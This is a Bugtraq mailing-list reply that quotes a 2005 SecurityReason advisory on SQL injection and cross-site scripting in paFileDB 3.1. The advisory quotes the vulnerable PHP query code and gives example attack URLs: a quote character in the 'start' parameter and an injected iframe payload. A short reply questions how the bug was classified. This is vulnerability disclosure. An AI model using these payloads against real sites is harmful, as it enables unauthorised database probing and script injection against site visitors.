In-Reply-To: <20050312182442.22116.qmail@xxxxxxxxxxxxxxxxxxxxx> >Received: (qmail 27749 invoked from network); 12 Mar 2005 19:45:27 -0000 >Received: from outgoing.securityfocus.com (HELO outgoing2.securityfocus.com) (205.206.231.26) > by mail.securityfocus.com with SMTP; 12 Mar 2005 19:45:27 -0000 >Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20]) > by outgoing2.securityfocus.com (Postfix) with QMQP > id 6C68014544F; Sat, 12 Mar 2005 12:52:18 -0700 (MST) >Mailing-List: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm >Precedence: bulk >List-Id: <bugtraq.list-id.securityfocus.com> >List-Post: <mailto:bugtraq@xxxxxxxxxxxxxxxxx> >List-Help: <mailto:bugtraq-help@xxxxxxxxxxxxxxxxx> >List-Unsubscribe: <mailto:bugtraq-unsubscribe@xxxxxxxxxxxxxxxxx> >List-Subscribe: <mailto:bugtraq-subscribe@xxxxxxxxxxxxxxxxx> >Delivered-To: mailing list bugtraq@xxxxxxxxxxxxxxxxx >Delivered-To: moderator for bugtraq@xxxxxxxxxxxxxxxxx >Received: (qmail 32145 invoked from network); 12 Mar 2005 04:00:48 -0000 >Date: 12 Mar 2005 18:24:42 -0000 >Message-ID: <20050312182442.22116.qmail@xxxxxxxxxxxxxxxxxxxxx> >Content-Type: text/plain >Content-Disposition: inline >Content-Transfer-Encoding: binary >MIME-Version: 1.0 >X-Mailer: MIME-tools 5.411 (Entity 5.404) >From: SecurityReason <sp3x@xxxxxxxxxxxxxxxxxx> >To: bugtraq@xxxxxxxxxxxxxxxxx >Subject: [SECURITYREASON.COM] SQL injection and XSS in paFileDB > > > >-=[ SecurityReason-2005-SRA#03 ]=- > >-=[ SQL injection and XSS in paFileDB ]=- > >Author: sp3x >Date: 12 March 2005 > >Affected software : >=================== >paFileDB version : =>3.1 > >Description : >============= > >paFileDB is designed to allow webmasters have a database of files for download on their site. >To add a download, all you do is upload the file using FTP or whatever method you use, log >into paFileDB's admin center, and fill out a form to add a file. paFileDB lets you edit and >delete the files too. >No more messing with a bunch of HTML pages for a file database on your site! >Using speedy MySQL for storing data, and powerful PHP for processing everything, paFileDB is >one of the best and easiest ways to manage files! > >SQL injection: >======================= > >/includes/viewall.php >/includes/category.php > >Code: >------------------------------------------------------------------------------------------------- >if ($sortby == "name") { > $result = $pafiledb_sql->query($db, "SELECT * FROM $db[prefix]_files WHERE file_pin = '0' ORDER BY file_name > >ASC LIMIT $start,20", 0); >} >if ($sortby == "date") { > $result = $pafiledb_sql->query($db, "SELECT * FROM $db[prefix]_files WHERE file_pin = '0' ORDER BY file_time > >DESC LIMIT $start,20", 0); >} >if ($sortby == "downloads") { > $result = $pafiledb_sql->query($db, "SELECT * FROM $db[prefix]_files WHERE file_pin = '0' ORDER BY file_dls > >DESC LIMIT $start,20", 0); >} >if ($sortby == "rating") { > $result = $pafiledb_sql->query($db, "SELECT * FROM $db[prefix]_files WHERE file_pin = '0' ORDER BY > >(file_rating/file_totalvotes - 1) DESC LIMIT $start,20", 0); >} >-------------------------------------------------------------------------------------------------- > >As we can see the $start variable is vuln for sql injection attack. >But this sql injection for now is not critical , why ? because if we want to inject malicious code to sql sentence > >after "ORDER BY" or after "LIMIT", then in current MySql versions, all we can do, is to fail the sql request. No > >UNION-s etc. When we try to inject sql sentence we get : "Wrong usage of UNION and ORDER BY Error number: 1221" so we > >must wait When Mysql version 4.1 will be widely used then we can have something like this - "ORDER BY desc ASC LIMIT > >(SELECT our_table FROM pafiledb_admin)...". > >Examples: >========= > >Sql injection: >-------------- >http://[target]/[pafiledb_dir]/pafiledb.php?action=viewall&start='&sortby=rating >http://[target]/[pafiledb_dir]/pafiledb.php?action=category&start='&sortby=rating > >error message : >--------------- >paFileDB was unable to successfully run a MySQL query. >MySQL Returned this error: You have an error in your SQL syntax near '\',20' at line 1 Error number: 1064 >The query that caused this error was: SELECT * FROM pafiledb_files WHERE file_pin = '0' ORDER BY > >(file_rating/file_totalvotes - 1) DESC LIMIT \',20 > >Also in this error message we can see the [prefix] pafiledb tables that should be hidden :) >And we can insert XSS code in error message for example : > >Cros Site Scripting (XSS): >-------------------------- > >http://[target]/[pafiledb_dir]/pafiledb.php?action=viewall&start=";><iframe%20src=http://www.securityreason.com></iframe > >>&sortby=rating >http://[target]/[pafiledb_dir]/pafiledb.php?action=category&start=";><iframe%20src=http://www.securityreason.com></ifram > >e>&sortby=date > >error message : >--------------- >paFileDB was unable to successfully run a MySQL query. >MySQL Returned this error: You have an error in your SQL syntax near '[Our XSS]',20' at line 1 Error number: 1064 >The query that caused this error was: SELECT * FROM pafiledb_files WHERE file_pin = '0' ORDER BY > >(file_rating/file_totalvotes - 1) DESC LIMIT [Our XSS]',20 > >How to fix : >============ > >Download the new version of the script or update. > >Vendor : >======== > >No respond > > >Greetz : >======== > >Special greetz : cXIb8O3 , pkw :] > >Contact : >========= > >sp3x[at]securityreason[dot].com >www.securityreason.com > Dear sp3x are you sure this is SQL injection or XSS ? i do not think it's SQL injection becuse u use XSS Vuln in your Bug i hope you read more info about SQL injection
